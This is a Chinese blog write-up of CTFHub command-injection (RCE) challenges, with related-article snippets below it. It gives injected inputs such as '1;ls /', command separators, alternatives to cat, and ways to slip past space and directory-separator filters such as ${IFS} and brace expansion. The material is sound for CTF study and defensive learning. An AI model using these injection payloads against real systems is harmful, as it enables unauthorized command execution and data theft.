CTFHUB技能书-RCE-WP

最新推荐文章于 2024-05-10 19:38:12 发布
最新推荐文章于 2024-05-10 19:38:12 发布
阅读量263 收藏 1
点赞数
分类专栏: ctf-WP 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46743327/article/details/116210873
版权

因为学生工作原因,好久没有认真学习ctf了,做点题复习一下。

无过滤

分号啥的都可
1;ls /(cat)

&            表示将任务置于后台执行
;            多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块
&&           只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。
||           只有在 || 左边的命令返回假(命令返回值 $? == 1),||右边的命令才会被执行。
%0a          
%0d            
| (管道符)     |表示管道,上一条命令的输出,作为下一条命令的参数

过滤cat

换别的命令 tac之类

cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f

过滤空格

用${IFS}

还可以
$IFS
$IFS$1
${IFS}
$IFS$9
<     比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20
%09

过滤目录分隔符

用cd切目录
1;cd flag_is_here;cat flag_70611185326673.php|base64

过滤运算符

用分号或者%0a

综合过滤

用${IFS}绕过空格,%0a分隔命令,cd切目录,tac代替cat fl*来绕过flag

_wand1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log ' uname -a ' 参考
ctfhub技能+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 6万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
CTFHub RCE wp和做题笔记
最新发布
xiaoyuanzi489的博客
05-10 778
system()执行系统命令,例如能将字符串作为系统命令执行,但是只返回执行结果的最后一行(约等于无回显);能将字符串作为系统命令执行eval()将字符串作为php代码执行assert()将字符串作为php代码执行$_REQUEST获得GET和POST传入的参数。
CTFHub技能解题笔记-密码口令-默认口令
qq_43006864的博客
12-21 446
一、打开题目,是一个平平无奇的登陆界面。 其实也没啥头绪了,但是看到他页面最下方,那个北京亿中邮信息技术有限公司,好像像是优点么点意思。 我寻思百度一下。看看能不能找到默认账户和口令。好家伙,这一搜索直接再其他大佬的博客里找到了个这。 然后,我就开始本办法了。各种试,就出来了,没有任何工具,就一波社工学了,资产收集了属于是。 ...
CTFHub技能解题笔记-RCE-命令注入
qq_43006864的博客
03-31 1081
打开题目是命令注入,题目要求是这是一个在线测试网络延迟的平台,路由器中经常会见到。无任何安全措施,尝试获取 flag。 竟然是没有任何安全措施的。那就开整了。 打开题目是源代码,这个和dvwa上的命令注入就是一样的。 那没啥好说的直接开测了。ping 114.114.114.114. 拼接命令ping 114.114.114.114;ls 找flag。ls了半天,最后再第一步的247711895227.php 的界面源码里找到了 这道题没做任何难度,没有难度。 ...
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 4500
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTFHub-RCE_eval执行-wp
z1moq的博客
06-21 383
首先看看RCE是什么 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞 ———.
CTF相关了解
qq_44841017的博客
04-21 1505
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
CTFHUB技能树(全详细解析含进阶)
hxhxhxhxx的博客
01-17 2万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-...
x微E-Cology WorkflowServiceXml RCE1
08-03
x微E-Cology WorkflowServiceXml RCEx 微 E-Cology WorkflowServiceXml RCEx 微 E-Cology
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
CTFhub技能数_RCE_WP
2301_77012056的博客
07-24 108
尝试在url上传参,此处system()函数的功能:执行系统命令并输出执行结果,pwd查看当前路径,发现system()函数没有被过滤,能用。$9指的是当前系统shell进程的第九个参数的持有者,就是一个空字符串,因此$9相当于没有加东西,等于做了一个前后隔离。在index.php中include了一个文件,不管文件是什么,都能直接出现在index.php中。由于题目只对file的参数中是否含有flag做了限制,所以我完全可以从POST的方式来获取flag。以get的方式传参,payload:?
CTFHub 技能rce
weixin_63231007的博客
05-18 1132
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
CTFHub WP PHP-FPM
m0_62879498的博客
04-09 785
CTFHub WP PHP-FPM PHP-FPM未授权访问漏洞 早期的web服务器只能处理html等静态服务器,但是随着 技术的发展出现的动态语言,web服务器无法处理。这时候出现了各种语言的解释器,但是web服务器如何于语言解释器进行沟通,如何去判断是什么语言,这时候 cgi协议应运而生。只要我们按照cgi协议去编写代码,就可以被服务器识别。 但是 web服务器每收到一个请求,都会去请求一个 cgi程序 ,解析完成结束进程。这样的话,假如请求次数过多,每一个请求都会进行一次 开启、结束,造成了资源的浪费
CTFHub技能解题笔记-RCE-eval执行
qq_43006864的博客
01-27 2613
打开题目 直接就是源码。 意思是传参cmd,然后直接就执行cmd,不做任何过滤。 然后我们直接传入命令,进行测试?cmd=system("ls"); 这里直接查询了当前目录。但是没有flag,我们尝试返回上一层。 /在这里做返回上一层,可叠加使用,/../../。 看到了flag_17023。 直接查看一下,这里没做过滤,我们直接运行?cmd=system("cat /flag_17023") 就拿到了flag,这一道就是非常简答单的rce远程命令代码执行漏
CTFHUB技能树——web篇
qq_63980959的博客
04-20 4474
因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。
ctf每日练习-第三天
想变得强大,虽然现在还弱不禁风
08-31 838
easychallenge(来自攻防世界crypto新手区) 下载附件是一个pyc文件,需要反编译 在线反编译链接: 链接 编译后发现是三重加密,直接反过来写一手解密脚本 import base64 def decode1(ans): s = '' for i in ans: x = ord(i) - 25 x = x ^36 s += chr(x) return s def decode2(ans): s =
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值